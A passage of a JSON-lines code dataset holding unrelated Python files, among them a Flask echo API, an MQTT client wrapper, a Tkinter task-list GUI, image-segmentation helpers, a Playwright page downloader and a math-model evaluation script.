Projects/Class_Pys/sebesseg.py","file_name":"sebesseg.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"hu","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38801878980","text":"from flask import Flask, request\nimport json\nimport requests\nimport nltk\nimport sklearn\n\nprint('The nltk version is {}.'.format(nltk.__version__))\nprint('The scikit-learn version is {}.'.format(sklearn.__version__))\napp = Flask(__name__)\n\n\n@app.route('/api/foo/', methods=['GET'])\ndef foo():\n bar = request.args.to_dict()\n #japp_json = json.dumps(bar)\n\n response = app.response_class(\n response=json.dumps(bar),\n status=200,\n mimetype='application/json'\n )\n return response\n\nif __name__ == '__main__': \n app.run(debug=True)","repo_name":"MohamedAliBenAlaya/Autoplus_DataScience","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36642274445","text":"\n'''\n1. 
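Both getDeltaVexistent and getDeltaVsplits compute the repeat-observation velocity difference as dv = c * |z1 - z2| / (1 + min(z1, z2)). Factored out as a standalone helper (a sketch; the sample redshifts are illustrative):

C_KMS = 299792.458  # speed of light in km/s

def delta_v(z1: float, z2: float) -> float:
    # velocity difference between two redshift measurements, in km/s
    return abs(z1 - z2) * C_KMS / (1 + min(z1, z2))

print(delta_v(0.500, 0.501))  # roughly 200 km/s for a typical LRG repeat pair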
Make Sure You Understand the Problem\n 0 1\n 1 2 3\n 2 4 5 6 \n 3 8 9\n\n2. Design a Solution / Runtime and Space Complexity\nHave a levels outout list\nnext_level queue with our root in it \n\nwhile there is a root and next_level. Set cur_level = next_level. Reset next level as new queue\nappend a new list to levels.\n\nWant to add each node in cur_levels to levels output list. Then add each of their children to our next_level queue\n\nreturn reverse levels list\n\n3. Write a Template for Code in Logical Blocks. Aka Pseudocode\nnext level initialized with root node\nlevels output list\n\nwhile root and next_level:\n cur_level = next_level\n reset next level\n append new list to output levels list\n\n # Append node to last list in output list\n for node in cur_levels\n levels[-1].append(node)\n\n if left child add to next level\n if right child add to next level\n\n\nreturn reversed levels list\n4. Write the Code And Pass Test Cases.\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n # Level order\n next_level = deque()\n next_level.append(root)\n \n answer = []\n\n while root and next_level:\n cur_level = next_level\n next_level = deque()\n answer.append([]) \n \n # Add each node in current level\n for node in cur_level:\n answer[-1].append(node.val)\n \n if node.left:\n next_level.append(node.left)\n if node.right:\n next_level.append(node.right)\n \n answer.reverse()\n return answer\n ","repo_name":"balanced-energy/leetcode","sub_path":"0107-binary-tree-level-order-traversal-ii/0107-binary-tree-level-order-traversal-ii.py","file_name":"0107-binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420606961","text":"import EditorTest\n\nimport unittest\n\nfrom model.AssetsModel import AssetsModel\n\nfrom utils.AppConfig import AppConfig\n\nfrom native.EditorNative import EditorNative\nfrom native.EntityNativeLoader import EntityNativeLoader\nfrom native.MemoryStream import MemoryStream\n\ndef _dumpEntityToMemoryStream(entity, stream):\n stream.writeString(entity._name)\n stream.writeBool(entity._isInternal)\n if entity._childId is not None:\n stream.writeInt(entity._childId)\n else:\n stream.writeInt(-1)\n stream.writeInt(len(entity._logics) + 1)\n entity._tmLogic.writeToStream(stream)\n for logic in entity._logics:\n logic.writeToStream(stream)\n stream.writeInt(len(entity._children))\n for child in entity._children:\n _dumpEntityToMemoryStream(child, stream)\n\nclass EntityContentTests(unittest.TestCase):\n\n ASSETS = None\n EDITOR = None\n\n @classmethod\n def setUpClass(cls):\n cls.ASSETS = AssetsModel(AppConfig())\n if not cls.ASSETS.init():\n cls.ASSETS = None\n raise RuntimeError(\"Can't init Assets model\")\n cls.EDITOR = EditorNative(AppConfig())\n if not cls.EDITOR.init():\n cls.EDITOR = None\n raise RuntimeError(\"Can't init editor native\")\n\n @classmethod\n def tearDownClass(cls):\n if cls.EDITOR is not None:\n cls.EDITOR.deinit()\n cls.EDITOR = None\n\n def _getAssets(self):\n return EntityContentTests.ASSETS\n\n def _getEntityLoader(self):\n return EntityContentTests.EDITOR.getEntityLoader()\n\n def testLoadOfAllEntities(self):\n fileTree = self._getAssets().getEntitiesTree()\n loadList = 
[]\n for item in fileTree.getChildren():\n loadList.append(item)\n while len(loadList) > 0:\n item = loadList[-1]\n loadList.pop()\n if item.isDir():\n for childItem in item.getChildren():\n loadList.append(childItem)\n else:\n entity = self._getEntityLoader().loadEntity(item.getRelativePath())\n self.assertIsNotNone(entity)\n self.assertTrue(entity.loadToNative())\n entity.unloadFromNative()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/Tests/EntityContentTests.py","file_name":"EntityContentTests.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"540381467","text":"import asyncio\nimport threading\nimport re\nimport logging\nimport json\nimport os\nimport queue\nimport time\nfrom uuid import uuid4\nfrom hbmqtt.client import MQTTClient\nfrom hbmqtt.mqtt.constants import QOS_0\n\nclass CustomMqttClient(MQTTClient):\n def __init__(self, client_id=None, config=None, loop=None, on_reconnect=None):\n super(CustomMqttClient, self).__init__(client_id, config, loop)\n self.on_reconnect = on_reconnect\n\n async def reconnect(self, cleansession=True):\n code = await super(CustomMqttClient, self).reconnect(cleansession)\n\n if self.on_reconnect is not None:\n if asyncio.iscoroutinefunction(self.on_reconnect):\n await self.on_reconnect()\n else:\n self.on_reconnect()\n\n return code\n\nclass MqttClient:\n def __init__(self, connection_string, topic_ns=os.environ.get('MQTT_TOPIC_NS', None), check_mqtt5_compatibility=True, logger=None, client_id=None):\n if client_id is None:\n client_id = MqttClient.create_client_id('MqttClient')\n\n self.logger = logger\n\n if self.logger is None:\n self.logger = logging.getLogger(client_id)\n\n self.client = CustomMqttClient(client_id, on_reconnect=self.__on_reconnect)\n self.client.config['reconnect_retries'] = 100000\n self.client.config['reconnect_max_interval'] = 2\n self.subscriptions = []\n self.check_mqtt5_compatibility = check_mqtt5_compatibility\n self.is_mqtt5_compatible = False\n self.topic_ns = None\n\n if topic_ns is not None:\n if re.fullmatch(r'^[\\/\\w]+\\/$', topic_ns) is not None:\n self.topic_ns = topic_ns\n self.logger.info('*****INFO***** Using topic namespace {}'.format(self.topic_ns))\n else:\n raise Exception('Given topic namespace {} is invalid. It has to have a trailing slash'.format(topic_ns))\n else:\n self.logger.warning('*****WARNING***** No topic namespace given. 
Tip: Also check all topics of your subscriptions and publications')\n\n init_future = asyncio.ensure_future(self.__init(connection_string))\n init_future.add_done_callback(self.__on_init_complete)\n\n self.init_complete_future = asyncio.get_event_loop().create_future()\n\n async def publish_json(self, topics, json_, options=None):\n if options is None:\n options = {}\n\n self.__validate_json(json_)\n\n await self.publish(topics, json.dumps(json_, separators=(',', ':')), options)\n\n async def publish(self, topics, message, options=None):\n if options is None:\n options = {}\n\n await self.init_complete_future\n\n if isinstance(topics, list) is False:\n topics = [topics]\n\n options = {**{'qos': QOS_0, 'retain': False}, **options}\n\n for topic in topics:\n prefixed_topic = self.__prefix_topic_ns(topic)\n self.logger.debug('Sending {} to {}'.format(message, prefixed_topic))\n await self.client.publish(prefixed_topic, message.encode('utf-8'), qos=options['qos'], retain=options['retain'])\n\n async def subscribe_json(self, topic, callback, qos=0):\n await self.subscribe(topic, callback, qos, True)\n\n async def subscribe(self, topic, callback, qos=QOS_0, to_json=False):\n await self.init_complete_future\n\n topic = self.__prefix_topic_ns(topic)\n\n subscription = Subscription(topic, callback, to_json, qos)\n\n self.subscriptions.append(subscription)\n\n await self.client.subscribe([(topic, qos)])\n\n self.logger.debug('Successfully subscribed to topic {}'.format(topic))\n\n return subscription\n\n async def disconnect(self):\n await self.client.disconnect()\n\n async def unsubscribe(self, topics):\n await self.init_complete_future\n\n await self.client.unsubscribe(topics)\n\n @staticmethod\n def create_client_id(prefix):\n return '{}-{}'.format(prefix, str(uuid4())[:8])\n\n async def __init(self, connection_string):\n # Connecting\n self.logger.info('Connecting...')\n\n while True:\n try:\n await self.client.connect(connection_string, cleansession=True)\n break\n except:\n await asyncio.sleep(1)\n\n self.logger.info('Starting on_message co-routine...')\n\n # Start message coroutine in background\n self.on_message_future = asyncio.ensure_future(self.__run_on_message())\n\n # Check for mqtt5 here\n if self.check_mqtt5_compatibility and self.is_mqtt5_compatible is False:\n await self.__mqtt5_probe(self.client, int(os.environ.get('MQTT5_PROBE_TIMEOUT', 1000)))\n\n def __on_init_complete(self, fut):\n try:\n # Check if an exception was raised during initialization\n fut.result()\n self.init_complete_future.set_result(True)\n # pylint: disable=broad-except\n except Exception as err:\n self.init_complete_future.set_exception(err)\n\n def __prefix_topic_ns(self, topic):\n if self.topic_ns is None:\n return topic\n\n return re.sub(r'^(\\$share\\/[^\\/]+\\/)?(?:{})?(.+)'.format(self.topic_ns), r'\\1' + self.topic_ns + r'\\2', topic)\n\n async def __on_reconnect(self):\n for subscription in self.subscriptions:\n if subscription.should_unsubscribe:\n continue\n\n self.logger.debug('Resubscribing to {}'.format(subscription.topic))\n await self.client.subscribe([(subscription.topic, subscription.qos)])\n\n async def __mqtt5_probe(self, client, timeout_ms):\n self.logger.debug('Start MQTT5 Probing...')\n\n probe_uuid = str(uuid4())[0:8]\n\n publish_to = 'probe/{}'.format(probe_uuid)\n subscribe_to = self.__prefix_topic_ns('$share/{}/{}'.format(str(uuid4())[0:8], publish_to))\n # Prefix the publish to topic\n publish_to = self.__prefix_topic_ns(publish_to)\n\n probe_subscription = 
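A quick standalone check of the __prefix_topic_ns rewrite above (the namespace 'iotea/' is only an example):

import re

topic_ns = 'iotea/'

def prefix(topic):
    # same pattern as __prefix_topic_ns: keep an optional $share group in front,
    # and avoid double-prefixing an already namespaced topic
    return re.sub(r'^(\$share\/[^\/]+\/)?(?:{})?(.+)'.format(topic_ns),
                  r'\1' + topic_ns + r'\2', topic)

print(prefix('sensor/temp'))            # iotea/sensor/temp
print(prefix('$share/g1/sensor/temp'))  # $share/g1/iotea/sensor/temp
print(prefix('iotea/sensor/temp'))      # iotea/sensor/temp (unchanged)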
ProbeSubscription(subscribe_to)\n self.subscriptions.append(probe_subscription)\n\n self.logger.debug('Probe subscription is {}'.format(subscribe_to))\n\n await client.subscribe([\n (subscribe_to, QOS_0)\n ])\n\n self.logger.debug('Publishing probe to {}'.format(publish_to))\n\n await client.publish(publish_to, 'probe-{}'.format(probe_uuid).encode('utf-8'), qos=QOS_0)\n\n timeout_at_ms = time.time() * 1000 + timeout_ms\n\n try:\n while probe_subscription.received_response is False:\n if time.time() * 1000 > timeout_at_ms:\n raise Exception('Probe on topic {} was not received on topic {}. An MQTT5 compilant broker is required'.format(publish_to, subscribe_to))\n\n await asyncio.sleep(0.1)\n finally:\n probe_subscription.unsubscribe()\n await self.client.unsubscribe([subscribe_to])\n self.subscriptions.remove(probe_subscription)\n\n self.is_mqtt5_compatible = True\n\n async def __run_on_message(self):\n while True:\n try:\n msg = await self.client.deliver_message()\n\n i = len(self.subscriptions) - 1\n\n while i >= 0:\n subscription = self.subscriptions[i]\n i -= 1\n if subscription.should_unsubscribe:\n await self.client.unsubscribe([subscription.topic])\n self.subscriptions.remove(subscription)\n continue\n\n subscription.messages.put_nowait(msg)\n # pylint: disable=broad-except\n except Exception as err:\n self.logger.warning(err)\n await asyncio.sleep(1)\n\n def __validate_json(self, json_=None):\n if json_ is not None and (isinstance(json_, dict) or isinstance(json_, list)):\n return\n\n raise Exception('Given JSON document is neither a dictionary nor a list')\n\nclass NamedMqttClient(MqttClient):\n def __init__(self, name, connection_string, topic_ns=os.environ.get('MQTT_TOPIC_NS', None), check_mqtt5_compatibility=True):\n client_id = MqttClient.create_client_id('{}.MqttClient'.format(name))\n super(NamedMqttClient, self).__init__(connection_string, topic_ns, check_mqtt5_compatibility, logging.getLogger(client_id), client_id)\n\nclass Subscription:\n def __init__(self, topic, cb, to_json=False, qos=0):\n self.qos = qos\n self.topic = topic\n\n # Without shared subscription group\n # Mask $ for platform events or $SYS topics\n self.topic_regex = re.compile(\n '^{}$'.format(re.sub(r'^(\\$share\\/[^\\/]+\\/)', '', topic).replace('$', '\\\\$').replace('.', '\\\\.').replace('+', '[^\\\\/]+').replace('#', '.*'))\n )\n\n self.messages = queue.Queue(0)\n self.should_unsubscribe = False\n\n self.subscription_loop = asyncio.new_event_loop()\n self.subscription_thread = threading.Thread(daemon=True, target=self.__start_subscription, args=(self.subscription_loop, cb, to_json,))\n self.subscription_thread.start()\n\n def unsubscribe(self):\n self.should_unsubscribe = True\n self.messages.put_nowait(None)\n self.subscription_thread.join()\n\n def __start_subscription(self, subscription_loop, cb, to_json):\n asyncio.set_event_loop(subscription_loop)\n subscription_loop.run_until_complete(self.__wrap_subscription_callback(cb, to_json))\n\n async def __wrap_subscription_callback(self, callback, to_json=False):\n while self.should_unsubscribe is False:\n message = self.messages.get(block=True)\n\n if message is None:\n continue\n\n if self.topic_regex.fullmatch(message.topic) is None:\n continue\n\n decoded_message = message.publish_packet.payload.data.decode('utf-8')\n\n if to_json:\n try:\n decoded_message = json.loads(decoded_message)\n self.__validate_json(decoded_message)\n # pylint: disable=broad-except\n except Exception:\n # json.JSONDecodeError from json.loads or Exception from 
__validate_json\n # Skip that message, since it's not a valid JSON document\n continue\n\n if asyncio.iscoroutinefunction(callback):\n await asyncio.ensure_future(callback(decoded_message, message.topic))\n else:\n callback(decoded_message, message.topic)\n\n def __validate_json(self, json_=None):\n if json_ is not None and (isinstance(json_, dict) or isinstance(json_, list)):\n return\n\n raise Exception('Given JSON document is neither a dictionary nor a list')\n\nclass ProbeSubscription(Subscription):\n def __init__(self, topic):\n super(ProbeSubscription, self).__init__(topic, self.__on_probe_receive, False)\n self.received_response = False\n\n # pylint: disable=unused-argument\n async def __on_probe_receive(self, msg, topic):\n asyncio.get_event_loop().call_soon_threadsafe(self.__set_received, [True])\n\n def __set_received(self, received):\n self.received_response = received\n","repo_name":"gunnarx/iot-event-analytics","sub_path":"src/sdk/python/pkg/iotea/core/util/mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"1522285269","text":"# -*- coding: utf-8 -*-\n\n\n'''\nDownload Anaconda Distribution for Python 2.7 version \nhttps://www.anaconda.com/download/#windows \n\ntkintertable \npip install tkintertable \n'''\n\nimport Tkinter as tk \nimport tkMessageBox\nimport ttk \n#from ttk import * \nfrom Tkinter import Menu \nfrom Tkinter import StringVar \n#to use tkintertable \nfrom tkintertable import TableCanvas, TableModel \n\n#Open Replenisher GUI\nwindow = tk.Tk() \nwindow.title(\"Welcome to Replenisher Task List app\") \nwindow.geometry('800x700')\n\n#User Info\nFirstNameLab = tk.Label(window, text=\"First Name\").grid(row=0)\nLastnameLab = tk.Label(window, text=\"Last Name\").grid(row=1) \nFirstName = tk.Entry(window) \nLastName = tk.Entry(window) \nFirstName.grid(row=0, column=1) \nLastName.grid(row=1, column=1) \n\n#Login button\ndef LoginButton():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Login')\nLoginBTN = tk.Button(window,text='Login', command = LoginButton)\nLoginBTN.place(relx=0.5, rely=0.5, anchor=tk.CENTER) \n\n#Logout button \ndef LogoutButton():\n global window\n window.destroy() \nLogoutBTN = tk.Button(window,text='Logout', command = LogoutButton)\nLogoutBTN.place(relx=1.0, rely=0.0, anchor=tk.NE) \n\n#Menu Actions of Assignment \ndef MenuAssignments():\n AssignmentsWindow = tk.Toplevel(window)\n AssignmentsWindow.title(\"Replenisher Assignments\") \n AssignmentsWindow.geometry('800x500')\n \n UserList = [\n \"User Selection\", \n \"User1\",\n \"User2\",\n \"User3\" \n ] \n UserVariable = StringVar(AssignmentsWindow)\n UserVariable.set(UserList[0]) # default value \n UserOptionMenu = tk.OptionMenu(AssignmentsWindow, UserVariable, *UserList)\n UserOptionMenu.pack()\n \n TaskList = [\n \"Task Selection\", \n \"Task1\",\n \"Task2\",\n \"Task3\" \n ] \n TaskVariable = StringVar(AssignmentsWindow)\n TaskVariable.set(TaskList[0]) # default value \n TaskOptionMenu = tk.OptionMenu(AssignmentsWindow, TaskVariable, *TaskList)\n TaskOptionMenu.pack() \n \n def AddUserTask():\n tkMessageBox.showinfo('Add User and Task', \"Added User: \" + UserVariable.get() + \"; \" + \"Added Task: \" + TaskVariable.get() ) \n \n AddUserTaskBT = tk.Button(AssignmentsWindow, text=\"Add User and Task\", command=AddUserTask)\n AddUserTaskBT.pack()\n \n #Add a table \n '''\n RowNum = 2\n ColNum = 2\n for i in range(RowNum): \n for j in range(ColNum): 
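A short, hedged usage sketch for the MqttClient defined above (the broker URL 'mqtt://localhost:1883' and the topic names are hypothetical; an MQTT5-capable broker is assumed, since the constructor runs a compatibility probe):

import asyncio

async def demo():
    # every topic below gets prefixed with the 'iotea/' namespace
    client = MqttClient('mqtt://localhost:1883', topic_ns='iotea/')

    def on_json(msg, topic):
        print(topic, msg)

    await client.subscribe_json('sensor/+', on_json)
    await client.publish_json('sensor/temp', {'value': 21.5})
    await asyncio.sleep(1)  # give the delivery loop time to run
    await client.disconnect()

asyncio.get_event_loop().run_until_complete(demo())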
\n b = tk.Entry(AssignmentsWindow, text=\"\")\n b.grid(row=i, column=j)\n b.pack()\n '''\n \n #To use tkintertable \n tframe = tk.Frame(AssignmentsWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'User': 'User1', 'Task': 'Task1', 'Status': 'Open', 'Rank': 1, 'Priority': 'High', 'Start Time': '05-19-2018 10:30', 'Finish Time': ''}, \n 'rec2': {'User': 'User2', 'Task': 'Task2', 'Status': 'Open', 'Rank': 2, 'Priority': 'Low', 'Start Time': '05-19-2018 11:30', 'Finish Time': '05-19-2018 22:30'},\n 'rec3': {'User': 'User3', 'Task': 'Task3', 'Status': 'Open', 'Rank': 3, 'Priority': 'Low', 'Start Time': '05-19-2018 12:30', 'Finish Time': '05-19-2018 22:45'} \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n \n AssignmentsWindow.mainloop()\n\n#Menu Actions of Task \ndef MenuTask():\n TaskWindow = tk.Toplevel(window)\n TaskWindow.title(\"Add New Tasks\") \n TaskWindow.geometry('800x500')\n \n TaskList = [\n \"Add Task\"\n ] \n TaskVariable = StringVar(TaskWindow)\n TaskVariable.set(TaskList[0]) # default value \n TaskOptionMenu = tk.OptionMenu(TaskWindow, TaskVariable, *TaskList)\n TaskOptionMenu.pack() \n \n def AddTask():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Add New Task') \n \n AddTaskBT = tk.Button(TaskWindow, text=\"Add Task\", command=AddTask)\n AddTaskBT.pack()\n \n #To use tkintertable \n tframe = tk.Frame(TaskWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'ID': 'Task1', 'Priority': 'High' }, \n 'rec2': {'ID': 'Task2', 'Priority': 'Low' },\n 'rec3': {'ID': 'Task3', 'Priority': 'Low' } \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n \n #Add New Row button\n def AddRowButton():\n table.addRow() \n table.redrawTable() \n \n AddRowBTN = tk.Button(TaskWindow,text='Add New Row', command = AddRowButton)\n AddRowBTN.place(relx=0.9, rely=0.15, anchor=tk.CENTER) \n \n TaskWindow.mainloop()\n\n#Menu Actions of User \ndef MenuUser():\n UserWindow = tk.Toplevel(window)\n UserWindow.title(\"Add New User\") \n UserWindow.geometry('800x500')\n \n UserList = [\n \"Add User\"\n ] \n UserVariable = StringVar(UserWindow)\n UserVariable.set(UserList[0]) # default value \n UserOptionMenu = tk.OptionMenu(UserWindow, UserVariable, *UserList)\n UserOptionMenu.pack()\n \n def AddUser():\n tkMessageBox.showinfo('WLabs Replenisher', 'Successfully Add New User') \n \n AddUserBT = tk.Button(UserWindow, text=\"Add User\", command=AddUser)\n AddUserBT.pack()\n \n #To use tkintertable \n tframe = tk.Frame(UserWindow)\n tframe.pack() \n model = TableModel()\n table = TableCanvas(tframe, model=model)\n table.createTableFrame()\n \n model = table.model\n data = {'rec1': {'ID': 'User1', 'First Name': 'Tom', 'Last Name': 'Cross' }, \n 'rec2': {'ID': 'User2', 'First Name': 'Jim', 'Last Name': 'Wood' },\n 'rec3': {'ID': 'User3', 'First Name': 'Bryan', 'Last Name': 'Bush' } \n } \n model.importDict(data) #Import from a dictionary to populate model\n table.redrawTable()\n\n #Add New Row button\n def AddRowButton():\n table.addRow() \n table.redrawTable() \n \n AddRowBTN = tk.Button(UserWindow,text='Add New Row', command = AddRowButton)\n AddRowBTN.place(relx=0.9, rely=0.15, anchor=tk.CENTER) \n \n UserWindow.mainloop()\n\n#End of Menu Actions \n \n#Help info\ndef MenuHelp():\n 
tkMessageBox.showinfo('WLabs Replenisher', 'WLabs, Great!') \n\n#Menu Items\nmenu = Menu(window)\nReplenisherItem = Menu(menu, tearoff=0)\nReplenisherItem.add_command(label='Assignments', command = MenuAssignments)\nReplenisherItem.add_separator()\nReplenisherItem.add_command(label='Tasks', command = MenuTask)\nReplenisherItem.add_separator()\nReplenisherItem.add_command(label='Users', command = MenuUser)\nmenu.add_cascade(label='Select Replenisher Tasks', menu=ReplenisherItem)\n\nHelpMenu = Menu(menu, tearoff=0)\nHelpMenu.add_command(label=\"About Walmart Labs\", command = MenuHelp) \nmenu.add_cascade(label=\"Help\", menu=HelpMenu) \n\nwindow.config(menu=menu)\n\nwindow.mainloop() \n\n\n","repo_name":"hyu21/Replenisher","sub_path":"WLabs.py","file_name":"WLabs.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26899433295","text":"# -*- coding: utf-8 -*-\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='3'\n\nimport pixellib\nfrom pixellib.semantic import semantic_segmentation\nfrom pixellib.instance import instance_segmentation\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\ndef imgg(immg):\n segment_image = semantic_segmentation()\n segment_image.load_pascalvoc_model(\"./deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\") \n segment_image.segmentAsPascalvoc(\"./\"+immg, output_image_name = \"static/\"+immg, overlay = True)\n\ndef pimgg(immg):\n segment_image = instance_segmentation()\n segment_image.load_model(\"./mask_rcnn_coco.h5\") \n segment_image.segmentImage(\"./\"+immg, output_image_name = \"static/2\"+immg)\n","repo_name":"paolodavid/Image-Segmentation","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21914379030","text":"from worldobject import *\n\n\nclass DamageEffect(WorldObject):\n image = None\n\n def __init__(self, tile_map):\n super().__init__(tile_map)\n if DamageEffect.image is None:\n DamageEffect.image = get_image('txt_critical.png')\n self.renderer = PSpriteObject(DamageEffect.image)\n self.add_element(self.renderer)\n\n def update(self, delta_time):\n super().update(delta_time)\n factor = self.time * 3\n smooth_factor = 4 * factor ** 3 - 6 * factor ** 2 + 3 * factor\n self.renderer.set_position(Vector2(0, 20 + smooth_factor * 20) / PIXEL_PER_UNIT)\n self.renderer.set_scale(Vector2(1, 2 - smooth_factor * 2))\n if factor >= 1:\n self.get_parent().remove_world_object(self)","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/damageeffect.py","file_name":"damageeffect.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6774338271","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(range(10))\n\nfor line in ax.get_xticklines() + ax.get_yticklines():\n line.set_markersize(10)\n\nplt.show()\n","repo_name":"apttyp/extraLearn","sub_path":"extra_lesson/demo_pic.py","file_name":"demo_pic.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24972449198","text":"# -*- coding: utf-8 -*-\n\"\"\" Util functions \"\"\"\n\n\ndef get_init_params(obj):\n init_params = obj.__init__.__code__.co_varnames\n obj_params = obj.__dict__.items()\n return {param: value 
for param, value in obj_params if param in init_params}\n\n\ndef object_init(obj):\n init_params = get_init_params(obj)\n return '{}(**{})'.format(obj.__class__.__name__, init_params)\n\n\ndef serialize(obj, name=None, result=None):\n \"\"\" Serialize an object to a dict \"\"\"\n if result is None:\n result = {}\n\n def make_name(obj, name=None):\n objname = obj.__class__.__name__\n if name is None:\n # name = objname\n return '({})'.format(objname)\n return '{} ({})'.format(name, objname)\n\n name = make_name(obj, name)\n\n try:\n # If it is an object, it has a __dict__\n obj_attr = obj.__dict__\n except AttributeError:\n # If it's NOT an object\n if isinstance(obj, (tuple, list)):\n newlist = []\n for element in obj:\n newlist.append(serialize(element))\n result[name] = newlist\n elif isinstance(obj, (dict,)):\n newdict = {}\n for key, element in obj.items():\n newdict[key] = serialize(element)\n result[name] = newdict\n else:\n result[name] = obj\n else:\n # If it IS an object\n attrs = {}\n result[name] = attrs\n for attr_name, attr_value in obj_attr.items():\n serialize(attr_value, attr_name, attrs)\n\n return result\n","repo_name":"fitoprincipe/geebap","sub_path":"geebap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"37"} +{"seq_id":"1652820277","text":"import os\nfrom playwright.sync_api import Page, expect, sync_playwright\n\n\ndef check_and_write(url, tries=0, max_tries=9):\n if tries > max_tries:\n return False\n try:\n page.goto(url)\n page.wait_for_load_state('domcontentloaded')\n html = page.content()\n with open('data/cookie_table/consolidated_html/{}.html'.format(url.replace('/', '-|slash|-')), 'w') as outfile:\n outfile.write(html)\n return True\n except Exception as e:\n print(e)\n return check_and_write(url, tries + 1)\n\n\nwith sync_playwright() as playwright:\n chromium = playwright.chromium\n browser = chromium.launch()\n context = browser.new_context()\n context.set_default_timeout(5000)\n page = context.new_page()\n everything_dict = {'nothing': [], 'cookie_declaration': [], 'cookie_settings': [], 'other': [], 'entities': [], 'purposes': [], 'activities': [], 'false_positive': []}\n\n with open('data/cookie_table/actual_cookie_tables.csv', 'r') as infile:\n for line in infile:\n split = line.strip().split(',')\n url = split[0]\n store = False\n if '0' in split[1]:\n if url not in everything_dict['nothing']:\n everything_dict['nothing'].append(url)\n if '1' in split[1]:\n if url not in everything_dict['cookie_declaration']:\n everything_dict['cookie_declaration'].append(url)\n store = True\n if '2' in split[1]:\n if url not in everything_dict['cookie_settings']:\n everything_dict['cookie_settings'].append(url)\n store = True\n if '3' in split[1]:\n if url not in everything_dict['other']:\n everything_dict['other'].append(url)\n store = True\n if '4' in split[1]:\n if url not in everything_dict['entities']:\n everything_dict['entities'].append(url)\n store = True\n if '5' in split[1]:\n if url not in everything_dict['purposes']:\n everything_dict['purposes'].append(url)\n store = True\n if '6' in split[1]:\n if url not in everything_dict['activities']:\n everything_dict['activities'].append(url)\n store = True\n if '7' in split[1]:\n if url not in everything_dict['false_positive']:\n everything_dict['false_positive'].append(url)\n if store:\n if check_and_write(url):\n print('Passed')\n else:\n print('Failed')\n with 
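A small illustrative call to the serialize helper above (the Point class is a made-up example, not from the repo):

class Point:
    def __init__(self, x, y):
        self.x = x  # plain attributes are stored under 'name (type)' keys
        self.y = y

# expected result: {'(Point)': {'x (int)': 1, 'y (int)': 2}}
print(serialize(Point(1, 2)))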
open('data/cookie_table/parsed_annotations.csv', 'w') as outfile:\n for key, val in everything_dict.items():\n outfile.write('{},{}\\n'.format(key, len(val)))\n","repo_name":"byron123t/cookie-tables","sub_path":"src/download_pages.py","file_name":"download_pages.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806099278","text":"import torch\nfrom transformers import (\n AutoModelForCausalLM,\n AutoTokenizer,\n BitsAndBytesConfig,\n)\nfrom peft import PeftModel\nimport json\n\nmodel_path = \"akjindal53244/Arithmo-Mistral-7B\"\n\nfrom datasets import load_dataset, concatenate_datasets\n\ndevice_map = {\"\": 0}\n\nft_model = AutoModelForCausalLM.from_pretrained(\n model_path,\n device_map=device_map\n)\n\ntokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\ntokenizer.pad_token = tokenizer.eos_token\n\npredictions = list()\n\nmath_test = load_dataset(\"competition_math\")\ndataset_size = len(math_test['test'])\nprint(f\"math_test size: {dataset_size}\")\n\ncount = 0\n# Adjust batch size based on available memory.\nbatch_size = 6\n\nfor i in range(0, dataset_size, batch_size):\n start = i\n end = start + batch_size if start + batch_size <= dataset_size else dataset_size\n examples = math_test[\"test\"][start:end]\n input_text_ft = [f\"Question: {each}\\n\\nAnswer:\" for each in examples[\"problem\"]]\n inputs_ft = tokenizer(input_text_ft, return_tensors=\"pt\", padding=True).to(\"cuda\")\n generated_ids = ft_model.generate(**inputs_ft, max_new_tokens=2048, temperature=0.0)\n output = tokenizer.batch_decode(generated_ids, 